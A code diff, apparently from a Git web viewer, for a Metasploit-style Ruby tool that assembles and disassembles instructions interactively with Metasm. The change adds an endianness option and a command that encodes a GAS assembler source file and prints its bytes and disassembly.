# This tool provides an easy way to see what opcodes are associated with
|
||||
# certain x86 instructions by making use of Metasm!
|
||||
# certain x86 instructions by making use of Metasm! Also allows to get
|
||||
# friendly output from a GAS assembler source code file.
|
||||
#
|
||||
#
|
||||
# $Revision$
|
||||
|
@ -32,6 +33,9 @@ require 'metasm'
|
|||
#PowerPC, seems broken for now in metasm
|
||||
#@Arch = ['Ia32','MIPS','PowerPC','ARM','X86_64']
|
||||
@Arch = ['Ia32','MIPS','ARM','X86_64']
|
||||
@Endian = ['little','big']
|
||||
@architecture = ""
|
||||
@endianess = ""
|
||||
|
||||
def usage
|
||||
$stderr.puts("\nUsage: #{$0} <options>\n" + $args.usage)
|
||||
|
@ -40,7 +44,8 @@ end
|
|||
|
||||
$args = Rex::Parser::Arguments.new(
|
||||
"-a" => [ true, "The architecture to encode as (#{@Arch.sort.collect{|a| a + ', ' }.join.gsub(/\, $/,'')})"],
|
||||
"-h" => [ false, "Display this help information" ])
|
||||
"-e" => [ true, "The endianess to encode as (#{@Endian.sort.collect{|a| a + ', ' }.join.gsub(/\, $/,'')})" ],
|
||||
"-h" => [ false, "Display this help information" ])
|
||||
|
||||
$args.parse(ARGV) { |opt, idx, val|
|
||||
case opt
|
||||
|
@ -48,12 +53,20 @@ $args.parse(ARGV) { |opt, idx, val|
|
|||
found = nil
|
||||
@Arch.each { |a|
|
||||
if val.downcase == a.downcase
|
||||
String.class_eval("@@cpu = Metasm::#{a}.new")
|
||||
@architecture = a
|
||||
found = true
|
||||
end
|
||||
}
|
||||
usage if not found
|
||||
when "-e"
|
||||
found = nil
|
||||
@Endian.each { |e|
|
||||
if val.downcase == e.downcase
|
||||
@endianess = e
|
||||
found = true
|
||||
end
|
||||
}
|
||||
usage if not found
|
||||
|
||||
when "-h"
|
||||
usage
|
||||
else
|
||||
|
@ -61,6 +74,14 @@ $args.parse(ARGV) { |opt, idx, val|
|
|||
end
|
||||
}
|
||||
|
||||
unless @architecture.empty?
|
||||
if @endianess.empty?
|
||||
String.class_eval("@@cpu = Metasm::#{@architecture}.new")
|
||||
else
|
||||
String.class_eval("@@cpu = Metasm::#{@architecture}.new(:#{@endianess})")
|
||||
end
|
||||
end
|
||||
|
||||
class String
|
||||
@@cpu ||= Metasm::Ia32.new
|
||||
class << self
|
||||
|
@ -98,23 +119,61 @@ class String
|
|||
def decode(base_addr=0, eip=base_addr)
|
||||
decode_blocks(base_addr, eip).to_s
|
||||
end
|
||||
|
||||
def disassemble(str, eip=0)
|
||||
Metasm::Shellcode.disassemble(@@cpu, str, eip)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def parse_gas_file(filename)
|
||||
unless ::File.exist?(filename)
|
||||
puts "File #{filename} not found"
|
||||
return
|
||||
end
|
||||
shellcode = ""
|
||||
puts "Reading file #{filename}"
|
||||
::File.open(filename, "rb") do |f|
|
||||
f.each_line do |l|
|
||||
l.gsub!(/#.*$/, "") # Delete comments
|
||||
l.gsub!(/@.*$/, "") # Delete comments
|
||||
l.gsub!(/\..*$/, "") # Delete directives
|
||||
l.gsub!(/(\r|\n)/, '') # Delete newlines... just in case...
|
||||
next if l.strip.empty?
|
||||
shellcode << "#{l}\n"
|
||||
end
|
||||
end
|
||||
|
||||
begin
|
||||
encoded = shellcode.encode
|
||||
puts Rex::Text.to_ruby(encoded)
|
||||
puts encoded.disassemble(shellcode.encode)
|
||||
rescue Metasm::Exception => e
|
||||
puts "Error: #{e.class} #{e.message}"
|
||||
end
|
||||
end
|
||||
|
||||
# Start a pseudo shell and dispatch lines to be assembled and then
|
||||
# disassembled.
|
||||
shell = Rex::Ui::Text::PseudoShell.new("%bldmetasm%clr")
|
||||
shell.init_ui(Rex::Ui::Text::Input::Stdio.new, Rex::Ui::Text::Output::Stdio.new)
|
||||
|
||||
puts 'type "exit" or "quit" to quit', 'use ";" or "\\n" for newline', ''
|
||||
puts [
|
||||
'type "exit" or "quit" to quit',
|
||||
'use ";" or "\\n" for newline',
|
||||
'type "file <file>" to parse a GAS assembler source file',
|
||||
'']
|
||||
|
||||
shell.run { |l|
|
||||
l.gsub!(/(\r|\n)/, '')
|
||||
l.gsub!(/\\n/, "\n")
|
||||
l.gsub!(/\\n/, "\n")
|
||||
l.gsub!(';', "\n")
|
||||
|
||||
break if %w[quit exit].include? l.chomp
|
||||
if l.chomp.index(/^file (.*)/)
|
||||
parse_gas_file($1)
|
||||
next
|
||||
end
|
||||
next if l.strip.empty?
|
||||
|
||||
begin
|
||||
|
|
Loading…
Reference in New Issue